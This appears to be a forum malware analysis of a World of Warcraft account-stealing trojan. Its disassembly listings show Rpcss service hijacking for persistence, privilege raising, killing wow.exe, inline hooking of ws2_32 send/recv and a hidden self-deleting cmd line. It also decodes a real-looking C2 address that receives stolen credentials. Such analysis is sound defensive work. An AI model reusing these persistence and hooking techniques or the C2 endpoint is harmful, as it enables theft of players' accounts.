10001156 |. 0F84 D3000000 je 1000122F 不是svchost.exe进程就跳转结束
1000115C |. A0 202A0110 mov al, byte ptr [10012A20]
10001161 |. 6A 40 push 40
10001163 |. 8885 FCFEFFFF mov byte ptr [ebp-104], al
10001169 |. 59 pop ecx
1000116A |. 33C0 xor eax, eax
1000116C |. 8DBD FDFEFFFF lea edi, dword ptr [ebp-103]
10001172 |. F3:AB rep stos dword ptr es:[edi]
10001174 |. 66:AB stos word ptr es:[edi]
10001176 |. AA stos byte ptr es:[edi]
10001177 |. 8D85 FCFEFFFF lea eax, [local.65]
1000117D |. 50 push eax
1000117E |. 68 54500110 push 10015054 ; ASCII "system32"
10001183 |. E8 67080000 call 100019EF 字符处理函数2
10001188 |. 56 push esi ; /s2
10001189 |. 56 push esi ; |s1
1000118A |. E8 A90D0000 call <jmp.&MSVCRT.strcmp> ; \strcmp
1000118F |. 83C4 10 add esp, 10
10001192 |. 8D85 FCFEFFFF lea eax, [local.65]
10001198 |. 50 push eax
10001199 |. FF15 E0400110 call dword ptr [<&imagehlp.MakeSureD>; imagehlp.MakeSureDirectoryPathExists
1000119F |. 56 push esi ; /s2
100011A0 |. 56 push esi ; |s1
100011A1 |. E8 920D0000 call <jmp.&MSVCRT.strcmp> ; \strcmp
100011A6 |. 8D85 FCFEFFFF lea eax, [local.65]
100011AC |. 50 push eax
100011AD |. 68 3C500110 push 1001503C ; ASCII "system32\t329076.dll"
100011B2 |. E8 38080000 call 100019EF
100011B7 |. 56 push esi
100011B8 |. 8D85 FCFEFFFF lea eax, [local.65]
100011BE |. 68 10500110 push 10015010 ; ASCII "9*&"
100011C3 |. 50 push eax
100011C4 |. E8 E30A0000 call 10001CAC
100011C9 |. 8D85 FCFEFFFF lea eax, [local.65]
100011CF |. 50 push eax
100011D0 |. 6A 65 push 65
100011D2 |. 68 38500110 push 10015038 ; ASCII "BIN"
100011D7 |. FF35 04200010 push dword ptr [10002004]
100011DD |. E8 97020000 call 10001479 获取自身资源信息,生成文件t329076.dll
100011E2 |. BF 24500110 mov edi, 10015024 ; ASCII "t3svchos9*&t.exe"
100011E7 |. 57 push edi
100011E8 |. E8 63040000 call 10001650 创建一个互斥量
100011ED |. 83C4 30 add esp, 30
100011F0 |. 85C0 test eax, eax
100011F2 |. 75 3B jnz short 1000122F
100011F4 |. 57 push edi
100011F5 |. 33FF xor edi, edi
100011F7 |. 6A 01 push 1
100011F9 |. 57 push edi
100011FA |. E8 E50C0000 call 10001EE4
100011FF |. A3 00200010 mov dword ptr [10002000], eax
10001204 |. E8 760C0000 call 10001E7F
10001209 |. E8 1C090000 call 10001B2A 写注册表,把 Rpcss 服务的 DLL 路径设为 %SystemRoot%\system32\rpcss.dll(具体键名本帖未给出)。这个路径此时指向的已是木马 DLL,开机后由 svchost.exe 加载,完成持久化
1000120E |. 56 push esi ; /s2
1000120F |. 56 push esi ; |s1
10001210 |. E8 230D0000 call <jmp.&MSVCRT.strcmp> ; \strcmp
10001215 |. 57 push edi ; /pID
10001216 |. 57 push edi ; |flags
10001217 |. 57 push edi ; |arg
10001218 |. 68 00100010 push 10001000 ; |start = rpcss.10001000
1000121D |. 57 push edi ; |stksize
1000121E |. 57 push edi ; |security
1000121F |. FF15 AC400110 call dword ptr [<&MSVCRT._beginthrea>; \_beginthreadex 创建一个线程,线程作用加载t329076.dll
10001225 |. 83C4 2C add esp, 2C
10001228 |. 50 push eax ; /hObject
10001229 |. FF15 90400110 call dword ptr [<&KERNEL32.CloseHand>; \CloseHandle
1000122F |> 6A 01 push 1
10001231 |. 58 pop eax
10001232 |. 5F pop edi
10001233 |. 5E pop esi
10001234 |. C9 leave
10001235 \. C2 0C00 retn 0C[/code]盗号文件 t329076.dll 是魔兽木马本体,分析:查找 wow.exe,hook API 函数,读取 \WTF\Config.wtf 配置文件的信息,将截取到的游戏账户信息以 URL 参数的方式回传到作者地址(回传的域名/URL 本帖未列出)[code]100043B7 t>/$ B8 964F0010 mov eax, 10004F96
100043BC |. E8 9F0A0000 call 10004E60
100043C1 |. 837D 0C 01 cmp [arg.2], 1
100043C5 |. 75 44 jnz short 1000440B
100043C7 |. E8 F5D9FFFF call 10001DC1 获取API函数地址
100043CC |. 68 18040000 push 418
100043D1 |. E8 7A0A0000 call <jmp.&MSVCRT.operator new>
100043D6 |. 59 pop ecx
100043D7 |. 8BC8 mov ecx, eax
100043D9 |. 894D 0C mov [arg.2], ecx
100043DC |. 8365 FC 00 and [local.1], 0
100043E0 |. 85C9 test ecx, ecx
100043E2 |. 74 07 je short 100043EB
100043E4 |. E8 49000000 call 10004432
100043E9 |. EB 02 jmp short 100043ED
100043EB |> 33C0 xor eax, eax
100043ED |> FF75 08 push [arg.1]
100043F0 |. 834D FC FF or [local.1], FFFFFFFF
100043F4 |. 8BC8 mov ecx, eax
100043F6 |. A3 D8500110 mov dword ptr [100150D8], eax
100043FB |. E8 89EBFFFF call 10002F89 关键call 6,
10004400 |. FF75 08 push [arg.1] ; /hLibModule
10004403 |. FF15 84600110 call dword ptr [<&KERNEL32.DisableTh>; \DisableThreadLibraryCalls
10004409 |. EB 16 jmp short 10004421
1000440B |> 837D 0C 00 cmp [arg.2], 0
1000440F |. 75 10 jnz short 10004421
10004411 |. 8B0D D8500110 mov ecx, dword ptr [100150D8]
10004417 |. 85C9 test ecx, ecx
10004419 |. 74 06 je short 10004421
1000441B |. 8B01 mov eax, dword ptr [ecx]
1000441D |. 6A 01 push 1
1000441F |. FF10 call dword ptr [eax]
10004421 |> 8B4D F4 mov ecx, [local.3]
10004424 |. 6A 01 push 1
10004426 |. 58 pop eax
10004427 |. 64:890D 0000000>mov dword ptr fs:[0], ecx
1000442E |. C9 leave
1000442F \. C2 0C00 retn 0C[/code]进入关键call 6,[code]10002F89 /$ 55 push ebp
10002F8A |. 8BEC mov ebp, esp
10002F8C |. 81EC 14050000 sub esp, 514
10002F92 |. 8B45 08 mov eax, [arg.1]
10002F95 |. 53 push ebx
10002F96 |. 56 push esi
10002F97 |. 57 push edi
10002F98 |. 8BD9 mov ebx, ecx
10002F9A |. 50 push eax
10002F9B |. A3 B01C0110 mov dword ptr [10011CB0], eax
10002FA0 |. E8 86FDFFFF call 10002D2B
10002FA5 |. 59 pop ecx ; t329076.10000000
10002FA6 |. E8 C4F1FFFF call 1000216F 设置SeDebugPrivilege,提权
10002FAB |. 8B03 mov eax, dword ptr [ebx]
10002FAD |. 8BCB mov ecx, ebx
10002FAF |. FF50 04 call dword ptr [eax+4] 关键call 7,判断是不是wow.exe
10002FB2 |. E8 48FCFFFF call 10002BFF 关键call 8,作用本帖未分析
10002FB7 |. BE 28890110 mov esi, 10018928 ; expl9*&orer.exesystem32\t329*.dll
10002FBC |. 8DBD F8FDFFFF lea edi, [local.130]
10002FC2 |. A5 movs dword ptr es:[edi], dword ptr [>
10002FC3 |. A5 movs dword ptr es:[edi], dword ptr [>
10002FC4 |. A5 movs dword ptr es:[edi], dword ptr [>
10002FC5 |. A5 movs dword ptr es:[edi], dword ptr [>
10002FC6 |. 6A 3D push 3D
10002FC8 |. 33C0 xor eax, eax
10002FCA |. 59 pop ecx
10002FCB |. 8DBD 08FEFFFF lea edi, [local.126]
10002FD1 |. BE 08500010 mov esi, 10005008
10002FD6 |. F3:AB rep stos dword ptr es:[edi]
10002FD8 |. 56 push esi
10002FD9 |. 8D85 F8FDFFFF lea eax, [local.130]
10002FDF |. 68 08880110 push 10018808 ; 9*&%s\%s
10002FE4 |. 50 push eax
10002FE5 |. E8 E8F7FFFF call 100027D2 字符处理,得到explorer.exe字符串
10002FEA |. 83C4 0C add esp, 0C
10002FED |. 8D85 F8FDFFFF lea eax, [local.130]
10002FF3 |. BF B81D0110 mov edi, 10011DB8 ; C:\Documents and Settings\safe\桌面\OllyICE\LOADDLL.EXE
10002FF8 |. 50 push eax
10002FF9 |. 57 push edi
10002FFA |. FF15 2C1C0110 call dword ptr [10011C2C] ; shlwapi.StrStrIA 在当前进程路径(edi)中查找 explorer.exe。注意本次调试是用 LOADDLL.EXE 加载的,路径里没有 explorer.exe,所以会跳到 1000305F 走非 explorer 分支;实际感染时该 DLL 由注入进 explorer.exe 的远程线程加载,走的是 10003004 分支
10003000 |. 85C0 test eax, eax
10003002 |. 74 5B je short 1000305F 比较结果不一样就跳转
10003004 |. 8BCB mov ecx, ebx
10003006 |. E8 B5020000 call 100032C0 关键call 9,建进程快照,找到wow.exe进程并关闭
1000300B |. FF15 94600110 call dword ptr [<&KERNEL32.GetCurren>; [GetCurrentProcessId
10003011 |. 50 push eax ; /<%d>
10003012 |. 68 20890110 push 10018920 ; |t329076expl9*&orer.exesystem32\t329*.dll
10003017 |. 8D85 FCFEFFFF lea eax, [local.65] ; |
1000301D |. 68 18890110 push 10018918 ; |%s%d
10003022 |. 50 push eax ; |s
10003023 |. FF15 90610110 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
10003029 |. 8D85 FCFEFFFF lea eax, [local.65]
1000302F |. 33F6 xor esi, esi
10003031 |. 50 push eax
10003032 |. 6A 01 push 1
10003034 |. 56 push esi
10003035 |. E8 2AFCFFFF call 10002C64
1000303A |. 56 push esi ; /pID
1000303B |. 56 push esi ; |flags
1000303C |. 53 push ebx ; |arg
1000303D |. 68 79310010 push 10003179 ; |start = t329076.10003179
10003042 |. 56 push esi ; |stksize
10003043 |. 56 push esi ; |security
10003044 |. 8983 14040000 mov dword ptr [ebx+414], eax ; |
1000304A |. FF15 40610110 call dword ptr [<&MSVCRT._beginthrea>; \_beginthreadex 创建线程1,执行起始地址10003179H
10003050 |. 83C4 34 add esp, 34
10003053 |. 50 push eax
10003054 |. FF15 941C0110 call dword ptr [10011C94] ; kernel32.CloseHandle
1000305A |. E9 88000000 jmp 100030E7
1000305F |> 56 push esi ; /s2
10003060 |. 56 push esi ; |s1
10003061 |. E8 201E0000 call <jmp.&MSVCRT.strcmp> ; \strcmp
10003066 |. 59 pop ecx
10003067 |. 59 pop ecx
10003068 |. FF15 94600110 call dword ptr [<&KERNEL32.GetCurren>; [GetCurrentProcessId
1000306E |. 50 push eax ; /<%d>
1000306F |. 68 20890110 push 10018920 ; |t329076expl9*&orer.exesystem32\t329*.dll
10003074 |. 8D85 FCFEFFFF lea eax, [local.65] ; |
1000307A |. 68 18890110 push 10018918 ; |%s%d
1000307F |. 50 push eax ; |s
10003080 |. FF15 90610110 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
10003086 |. 8D85 FCFEFFFF lea eax, [local.65]
1000308C |. 50 push eax
1000308D |. E8 C6EDFFFF call 10001E58 创建一个互斥体,避免重复运行
10003092 |. 83C4 14 add esp, 14
10003095 |. 85C0 test eax, eax
10003097 |. 0F85 D5000000 jnz 10003172
1000309D |. 8D85 FCFEFFFF lea eax, [local.65]
100030A3 |. 50 push eax
100030A4 |. 6A 01 push 1
100030A6 |. 6A 00 push 0
100030A8 |. E8 B7FBFFFF call 10002C64
100030AD |. 8983 14040000 mov dword ptr [ebx+414], eax
100030B3 |. 83C3 04 add ebx, 4
100030B6 |. 83C4 0C add esp, 0C
100030B9 |. 833B 00 cmp dword ptr [ebx], 0
100030BC |. 74 29 je short 100030E7
100030BE |. 8BC3 mov eax, ebx
100030C0 |> 8B00 /mov eax, dword ptr [eax]
100030C2 |. 83C0 04 |add eax, 4
100030C5 |. 50 |push eax
100030C6 |. 57 |push edi
100030C7 |. FF15 2C1C0110 |call dword ptr [10011C2C] ; shlwapi.StrStrIA
100030CD |. 85C0 |test eax, eax
100030CF |. 74 0C |je short 100030DD
100030D1 |. E8 EC0A0000 |call 10003BC2 关键call 10
100030D6 |. 8B0B |mov ecx, dword ptr [ebx]
100030D8 |. E8 15120000 |call 100042F2 创建线程2,把wininet.dll复制为t3wininet.dll,加载t3wininet.dll
100030DD |> 83C3 04 |add ebx, 4
100030E0 |. 8BC3 |mov eax, ebx
100030E2 |. 833B 00 |cmp dword ptr [ebx], 0
100030E5 |.^ 75 D9 \jnz short 100030C0
100030E7 |> 8D85 F0FBFFFF lea eax, [local.260]
100030ED |. 50 push eax ; /Buffer
100030EE |. 68 04010000 push 104 ; |BufSize = 104 (260.)
100030F3 |. FF15 90600110 call dword ptr [<&KERNEL32.GetTempPa>; \GetTempPathA
100030F9 |. 8D85 F0FBFFFF lea eax, [local.260]
100030FF |. 68 10890110 push 10018910 ; /*.~~~
10003104 |. 50 push eax ; |ConcatString
10003105 |. FF15 4C600110 call dword ptr [<&KERNEL32.lstrcatA>>; \lstrcatA
1000310B |. 6A 05 push 5
1000310D |. BE F8880110 mov esi, 100188F8 ; cmd 9*&/c 9*&de9*&l %s
10003112 |. 59 pop ecx
10003113 |. 8DBD F4FCFFFF lea edi, [local.195]
10003119 |. F3:A5 rep movs dword ptr es:[edi], dword p>
1000311B |. 66:A5 movs word ptr es:[edi], word ptr [es>
1000311D |. A4 movs byte ptr es:[edi], byte ptr [es>
1000311E |. 6A 3B push 3B
10003120 |. 33C0 xor eax, eax
10003122 |. 59 pop ecx
10003123 |. 8DBD 0BFDFFFF lea edi, dword ptr [ebp-2F5]
10003129 |. F3:AB rep stos dword ptr es:[edi]
1000312B |. AA stos byte ptr es:[edi]
1000312C |. 68 08500010 push 10005008
10003131 |. 8D85 F4FCFFFF lea eax, [local.195]
10003137 |. 68 08880110 push 10018808 ; 9*&%s\%s
1000313C |. 50 push eax
1000313D |. E8 90F6FFFF call 100027D2
10003142 |. 83C4 0C add esp, 0C
10003145 |. 8D85 F0FBFFFF lea eax, [local.260]
1000314B |. 50 push eax
1000314C |. 8D85 F4FCFFFF lea eax, [local.195]
10003152 |. 50 push eax ; |Format
10003153 |. 8D85 ECFAFFFF lea eax, [local.325] ; |
10003159 |. 50 push eax ; |s
1000315A |. FF15 90610110 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
10003160 |. 83C4 0C add esp, 0C
10003163 |. 8D85 ECFAFFFF lea eax, [local.325]
10003169 |. 6A 00 push 0 ; /ShowState = SW_HIDE
1000316B |. 50 push eax ; |CmdLine
1000316C |. FF15 A8600110 call dword ptr [<&KERNEL32.WinExec>] ; \WinExec 删除t329076.dll文件
10003172 |> 5F pop edi
10003173 |. 5E pop esi
10003174 |. 5B pop ebx
10003175 |. C9 leave
10003176 \. C2 0400 retn 4[/code]关键call 7,判断是不是wow.exe[code]1000446B . B8 AA4F0010 mov eax, 10004FAA
; sub_1000446B — __thiscall (this arrives in ecx, copied to esi).
; Allocates a 0x110-byte object; if the allocation succeeded, calls 100044D6 on
; it with the "wow.exe" string, and stores the result in this->[+4].
; The eax/call 10004E60 pair at the top and the fs:[0] write at the bottom look
; like a compiler-generated SEH prologue/epilogue (scope data at 10004FAA);
; that is inferred from the shape only — confirm against 10004E60.
10004470 . E8 EB090000 call 10004E60 ; presumably the SEH prologue helper (sets up the ebp frame used below)
10004475 . 51 push ecx
10004476 . 56 push esi
10004477 . 8BF1 mov esi, ecx ; esi = this
10004479 . 68 10010000 push 110 ; object size = 0x110 bytes
1000447E . E8 CD090000 call <jmp.&MSVCRT.operator new>
10004483 . 59 pop ecx
10004484 . 8BC8 mov ecx, eax ; ecx = freshly allocated object (this for the call below)
10004486 . 894D F0 mov dword ptr [ebp-10], ecx
10004489 . 33C0 xor eax, eax
1000448B . 3BC8 cmp ecx, eax ; NULL check on the allocation
1000448D . 8945 FC mov dword ptr [ebp-4], eax ; [ebp-4] = 0 — looks like an SEH scope index; confirm
10004490 . 74 0A je short 1000449C ; allocation failed -> store NULL in this->[+4]
10004492 . 68 C08A0110 push 10018AC0 ; ASCII "wow.exe"
10004497 . E8 3A000000 call 100044D6 ; initialise the object with the target process name (body not in this listing)
1000449C > 8B4D F4 mov ecx, dword ptr [ebp-C]
1000449F . 8946 04 mov dword ptr [esi+4], eax ; this->[+4] = object, or NULL
100044A2 . 5E pop esi
100044A3 . 64:890D 0000000>mov dword ptr fs:[0], ecx ; unlink the exception frame installed above
100044AA . C9 leave
100044AB . C3 retn[/code]关键call 9,建进程快照,找到wow.exe进程并关闭[code]100032C0 /$ 55 push ebp
; sub_100032C0 — __thiscall (this in ecx, copied to ebx).
; this->[+4] is a zero-terminated array of entry pointers.  For every entry
; whose [+10C] field is non-zero, 10001F49 fills a local array from the entry's
; name field (entry+4) and returns a count; each element is then handed to the
; routine at slot +8 of the table pointed to by [this] (ecx = this), which the
; author identifies as the TerminateProcess path.  The process snapshot named in
; the author's heading is presumably taken inside 10001F49 — not visible here.
100032C1 |. 8BEC mov ebp, esp
100032C3 |. 81EC 14040000 sub esp, 414 ; local.261 = 0x410-byte array filled by 10001F49
100032C9 |. 53 push ebx
100032CA |. 8BD9 mov ebx, ecx ; ebx = this
100032CC |. 56 push esi
100032CD |. 57 push edi
100032CE |. 837B 04 00 cmp dword ptr [ebx+4], 0
100032D2 |. 8D73 04 lea esi, dword ptr [ebx+4] ; esi = &this->entries[0]
100032D5 |. 74 49 je short 10003320 ; empty table -> done
100032D7 |. 8BC6 mov eax, esi
100032D9 |> 8B00 /mov eax, dword ptr [eax] ; eax = current entry
100032DB |. 83B8 0C010000 0>|cmp dword ptr [eax+10C], 0 ; entry+10C == 0 stops the scan (field meaning not shown here)
100032E2 |. 74 3C |je short 10003320
100032E4 |. 8D85 ECFBFFFF |lea eax, [local.261]
100032EA |. 50 |push eax ; output array
100032EB |. 8B06 |mov eax, dword ptr [esi]
100032ED |. 83C0 04 |add eax, 4
100032F0 |. 50 |push eax ; entry+4 = name to look for (the "wow.exe" object above)
100032F1 |. E8 53ECFFFF |call 10001F49 ; returns number of matches in eax
100032F6 |. 59 |pop ecx
100032F7 |. 85C0 |test eax, eax
100032F9 |. 59 |pop ecx
100032FA |. 7E 1A |jle short 10003316 ; no matches -> next entry
100032FC |. 8DBD ECFBFFFF |lea edi, [local.261] ; edi walks the result array
10003302 |. 8945 FC |mov [local.1], eax ; local.1 = remaining count
10003305 |> 8B03 |/mov eax, dword ptr [ebx] ; eax = this's function table
10003307 |. FF37 ||push dword ptr [edi] ; one array element (handle/PID per the author)
10003309 |. 8BCB ||mov ecx, ebx ; ecx = this
1000330B |. FF50 08 ||call dword ptr [eax+8] ; TerminateProcess关闭魔兽进程 ; indirect call through table slot +8
1000330E |. 83C7 04 ||add edi, 4
10003311 |. FF4D FC ||dec [local.1]
10003314 |.^ 75 EF |\jnz short 10003305 ; until every match has been handled
10003316 |> 83C6 04 |add esi, 4 ; next entry pointer
10003319 |. 8BC6 |mov eax, esi
1000331B |. 833E 00 |cmp dword ptr [esi], 0
1000331E |.^ 75 B9 \jnz short 100032D9 ; NULL terminates the table
10003320 |> 5F pop edi
10003321 |. 5E pop esi
10003322 |. 5B pop ebx
10003323 |. C9 leave
10003324 \. C3 retn[/code]创建线程2线程里面的关键函数[code]1000430F . E8 FAEAFFFF call 10002E0E
; Fragment of the thread-2 routine (its entry is above this listing; the
; success path at 1000432C is below it).  Returns 0 (via 10004327) when either
; 10002E0E or 100014D6("t3wininet.dll") returns zero.
10004314 . 85C0 test eax, eax
10004316 . 74 0F je short 10004327 ; 10002E0E failed -> return 0
10004318 . 68 D4880110 push 100188D4 ; t3wininet.dll
1000431D . E8 B4D1FFFF call 100014D6 F7进去,在看call 10003BC2地址(call 10) ; per the author, this path leads to 10003BC2 (call 10)
10004322 . 85C0 test eax, eax
10004324 . 59 pop ecx
10004325 . 75 05 jnz short 1000432C ; success continues outside this listing
10004327 > 33C0 xor eax, eax ; failure: return 0
10004329 > C2 0400 retn 4[/code]关键call 10,代码如下:[code]10003BC2 /$ 55 push ebp
; sub_10003BC2 — cdecl helpers throughout (add esp,2C at the end cleans all
; five calls).  Sequence: WSAStartup(2.2); build the path to
; system32\t329076.ini in local.65; strip the "9*&" filler (100027D2);
; read up to 0x720 bytes of that file into the buffer at 100149B0 (10002618);
; decode it in place (10001FD9); then hand the decoded string to 10001586,
; which the author identifies as the network-connect routine.  The decoded
; buffer content shown by the debugger is the C2 URL below.
10003BC3 |. 8BEC mov ebp, esp
10003BC5 |. 81EC 94020000 sub esp, 294
10003BCB |. 56 push esi
10003BCC |. 8D85 6CFDFFFF lea eax, [local.165] ; WSADATA
10003BD2 |. 57 push edi
10003BD3 |. 50 push eax ; /pWSAData
10003BD4 |. 68 02020000 push 202 ; |RequestedVersion = 202 (2.2.)
10003BD9 |. E8 60120000 call <jmp.&WS2_32.#WSAStartup_115> ; \WSAStartup ; return value is not checked
10003BDE |. 8D85 FCFEFFFF lea eax, [local.65] ; path buffer
10003BE4 |. 50 push eax
10003BE5 |. 68 4C890110 push 1001894C ; system32\t329076.ini
10003BEA |. E8 D9E4FFFF call 100020C8 ; builds the full ini path into local.65 (same helper shape as elsewhere on the page)
10003BEF |. 68 08500010 push 10005008
10003BF4 |. 8D85 FCFEFFFF lea eax, [local.65]
10003BFA |. 68 08880110 push 10018808 ; 9*&%s\%s
10003BFF |. 50 push eax
10003C00 |. E8 CDEBFFFF call 100027D2 ; removes the "9*&" filler from the string (per the author's note at 10004033)
10003C05 |. BF 20070000 mov edi, 720 ; edi = buffer size 0x720
10003C0A |. BE B0490110 mov esi, 100149B0 ; ASCII "http://121.10.107.91:8080/dhwow2/fen/dsad47/post.asp"
10003C0F |. 57 push edi
10003C10 |. 8D85 FCFEFFFF lea eax, [local.65]
10003C16 |. 56 push esi
10003C17 |. 50 push eax
10003C18 |. E8 FBE9FFFF call 10002618 打开文件,读取t329076.ini文件内容 ; read(path, buf=100149B0, 0x720)
10003C1D |. 57 push edi
10003C1E |. 56 push esi
10003C1F |. E8 B5E3FFFF call 10001FD9 ; decode routine: decodes the buffer in place into http://121.10.107.91:8080/dhwow2/fen/dsad47/post.asp
10003C24 |. 56 push esi ; t329076.100149B0
10003C25 |. E8 5CD9FFFF call 10001586 网络连接 ; connect using the decoded URL
10003C2A |. 83C4 2C add esp, 2C ; 2+3+3+2+1 = 11 dwords of cdecl args
10003C2D |. 5F pop edi
10003C2E |. 5E pop esi
10003C2F |. C9 leave
10003C30 \. C3 retn[/code]100149B0 68 74 74 70 3A 2F 2F 31 32 31 2E 31 30 2E 31 30 http://121.10.10
100149C0 37 2E 39 31 3A 38 30 38 30 2F 64 68 77 6F 77 32 7.91:8080/dhwow2
100149D0 2F 66 65 6E 2F 64 73 61 64 34 37 2F 70 6F 73 74 /fen/dsad47/post
100149E0 2E 61 73 70 00 .asp.[code]1000258B /$ 53 push ebx
; sub_1000258B(table, count) — installs one hook per table entry.
; Entries are 0x543 bytes apart; esi points at entry+0x337 (module name) and
; entry+0x43B (esi+104) holds the export name.  For each entry: resolve the
; module (GetModuleHandleA, falling back to LoadLibraryA), resolve the export
; (GetProcAddress), add the per-entry adjustment at entry+0x122 ([esi-215]) and
; store the resulting hook address at entry+0x11E ([esi-219]) — the field that
; 1000249B reads as the target — then call 1000249B(entry).
; Returns 1 when every entry was processed (or count <= 0), 0 on the first
; failed module/export lookup.
; The two strcmp(edi, edi) calls compare a string with itself and use no result;
; they appear to be filler.
1000258C |. 55 push ebp
1000258D |. 33ED xor ebp, ebp ; ebp = entry index
1000258F |. 56 push esi
10002590 |. 396C24 14 cmp dword ptr [esp+14], ebp ; arg2 (count) <= 0 ?
10002594 |. 57 push edi
10002595 |. 7E 75 jle short 1000260C ; nothing to do -> return 1
10002597 |. 8B4424 14 mov eax, dword ptr [esp+14] ; arg1 = table base (after 4 pushes)
1000259B |. BF 08500010 mov edi, 10005008
100025A0 |. 8DB0 37030000 lea esi, dword ptr [eax+337] ; esi = entry->module_name
100025A6 |> 57 /push edi ; /s2
100025A7 |. 57 |push edi ; |s1
100025A8 |. E8 D9280000 |call <jmp.&MSVCRT.strcmp> ; \strcmp ; result unused
100025AD |. 59 |pop ecx
100025AE |. 59 |pop ecx
100025AF |. 56 |push esi ; /pModule
100025B0 |. FF15 60600110 |call dword ptr [<&KERNEL32.GetModul>; \GetModuleHandleA ; already loaded?
100025B6 |. 57 |push edi ; /s2
100025B7 |. 57 |push edi ; |s1
100025B8 |. 8BD8 |mov ebx, eax ; |
100025BA |. E8 C7280000 |call <jmp.&MSVCRT.strcmp> ; \strcmp ; result unused
100025BF |. 59 |pop ecx
100025C0 |. 85DB |test ebx, ebx
100025C2 |. 59 |pop ecx
100025C3 |. 75 0D |jnz short 100025D2 ; module handle found -> resolve export
100025C5 |. 56 |push esi ; /FileName
100025C6 |. FF15 A0600110 |call dword ptr [<&KERNEL32.LoadLibr>; \LoadLibraryA 加载wininet.dll ; otherwise load it
100025CC |. 8BD8 |mov ebx, eax
100025CE |. 85DB |test ebx, ebx
100025D0 |. 74 42 |je short 10002614 ; load failed -> return 0
100025D2 |> 8D86 04010000 |lea eax, dword ptr [esi+104] ; entry->export_name
100025D8 |. 50 |push eax ; /ProcNameOrOrdinal
100025D9 |. 53 |push ebx ; |hModule
100025DA |. FF15 A4600110 |call dword ptr [<&KERNEL32.GetProcA>; \GetProcAddress 获取API函数地址
100025E0 |. 85C0 |test eax, eax
100025E2 |. 74 30 |je short 10002614 ; export not found -> return 0
100025E4 |. 8B8E EBFDFFFF |mov ecx, dword ptr [esi-215] ; entry+0x122: offset added to the export address
100025EA |. 03C8 |add ecx, eax
100025EC |. 8D86 C9FCFFFF |lea eax, dword ptr [esi-337] ; eax = entry base
100025F2 |. 50 |push eax
100025F3 |. 898E E7FDFFFF |mov dword ptr [esi-219], ecx ; entry+0x11E = hook target address
100025F9 |. E8 9DFEFFFF |call 1000249B hook函数,hook了send,recv,closesocket函数 ; build the patch bytes for this entry (see below)
100025FE |. 45 |inc ebp
100025FF |. 81C6 43050000 |add esi, 543 ; next entry (stride 0x543)
10002605 |. 3B6C24 1C |cmp ebp, dword ptr [esp+1C] ; arg2 (count), read before the pop below
10002609 |. 59 |pop ecx
1000260A |.^ 7C 9A \jl short 100025A6
1000260C |> 6A 01 push 1
1000260E |. 58 pop eax ; return 1
1000260F |> 5F pop edi
10002610 |. 5E pop esi
10002611 |. 5D pop ebp
10002612 |. 5B pop ebx
10002613 |. C3 retn
10002614 |> 33C0 xor eax, eax ; return 0
10002616 \.^ EB F7 jmp short 1000260F[/code]进入hook函数,代码如下,下面是跟进的hook send函数:[code]1000249B /$ 53 push ebx
; sub_1000249B(entry) — prepares the inline-hook bytes for one entry (esi = entry).
; Fields used: [esi+11E] target address, [esi+11A] handler address,
; [esi+126] length of the target's first instructions (filled by 10002A76),
; esi+22E copy of the target's original bytes, esi+12A a 5-byte E8 (call) to
; the handler, esi+12F trampoline = original bytes followed by an E9 (jmp)
; back to target+length, esi+332 a 5-byte E9 (jmp) whose rel32 is computed as
; if it were located at the target — i.e. it is meant to be written over the
; target's first bytes and jump to esi+12A.  The writing of that last stub into
; the target is not in this listing.  The author's memory dumps below show the
; resulting bytes (E9 B3 D9 A0 61 / E9 3E 26 5F 9E).
; Detection note: this leaves a jmp at the first bytes of a ws2_32 export that
; lands outside the module — exactly what inline-hook scanners flag.
1000249C |. 56 push esi
1000249D |. 8B7424 0C mov esi, dword ptr [esp+C] ; esi = entry
100024A1 |. 57 push edi
100024A2 |. 8DBE 26010000 lea edi, dword ptr [esi+126] ; edi = &entry->length
100024A8 |. 57 push edi
100024A9 |. 6A 05 push 5 ; minimum bytes to relocate (size of a rel32 jmp)
100024AB |. FFB6 1E010000 push dword ptr [esi+11E] ; target address
100024B1 |. E8 C0050000 call 10002A76 ; presumably computes how many whole instructions cover >= 5 bytes and stores it in [edi] — confirm
100024B6 |. FF37 push dword ptr [edi] ; length
100024B8 |. 8D9E 2E020000 lea ebx, dword ptr [esi+22E] ; ebx = saved-bytes buffer
100024BE |. FFB6 1E010000 push dword ptr [esi+11E] ; source = target
100024C4 |. 53 push ebx
100024C5 |. E8 A0040000 call 1000296A 取函数的前5个字节,保存到木马模块中 ; copy(dst=esi+22E, src=target, len)
100024CA |. 8B86 1A010000 mov eax, dword ptr [esi+11A] ; handler address
100024D0 |. FF37 push dword ptr [edi]
100024D2 |. 2BC6 sub eax, esi
100024D4 |. C686 2A010000 E8 mov byte ptr [esi+12A], 0E8 ; E8 = call rel32
100024DB |. 2D 2F010000 sub eax, 12F ; rel32 = handler - (esi+12F), i.e. relative to the end of the 5-byte call at esi+12A
100024E0 |. 53 push ebx
100024E1 |. 8986 2B010000 mov dword ptr [esi+12B], eax
100024E7 |. 8D86 2F010000 lea eax, dword ptr [esi+12F] ; trampoline start
100024ED |. 50 push eax
100024EE |. E8 77040000 call 1000296A 把刚才保存的5个字节的起始地址赋给寄存器 ; copy(dst=esi+12F, src=esi+22E, len): original bytes into the trampoline
100024F3 |. 8B07 mov eax, dword ptr [edi] ; eax = len
100024F5 |. 83C4 24 add esp, 24 ; 9 dwords of cdecl args
100024F8 |. C68406 2F010000 E9 mov byte ptr [esi+eax+12F], 0E9 ; E9 = jmp rel32, placed right after the copied bytes
10002500 |. 8B86 1E010000 mov eax, dword ptr [esi+11E] hook地址给eax,这里hook ws2_32.send函数
10002506 |. 8B0F mov ecx, dword ptr [edi] ; ecx = len
10002508 |. 2BC6 sub eax, esi eax=71A24C27,esi=10017140,计算hook点到木马模块偏移地址
1000250A |. 2D 34010000 sub eax, 134 ; rel32 = (target+len) - (esi+len+134): jump back to the first untouched target byte
1000250F |. 5F pop edi
10002510 |. 89840E 30010000 mov dword ptr [esi+ecx+130], eax 把跳转的偏移保存到地址10017275h,这里内存显示E9 B3 D9 A0 61
10002517 |. 8BC6 mov eax, esi
10002519 |. 2B86 1E010000 sub eax, dword ptr [esi+11E] eax=1001725E ds:[10001725E]=71A24C27,计算木马模块跳回send函数第六个字节的偏移地址
1000251F |. C686 32030000 E9 mov byte ptr [esi+332], 0E9 ; E9 = jmp rel32
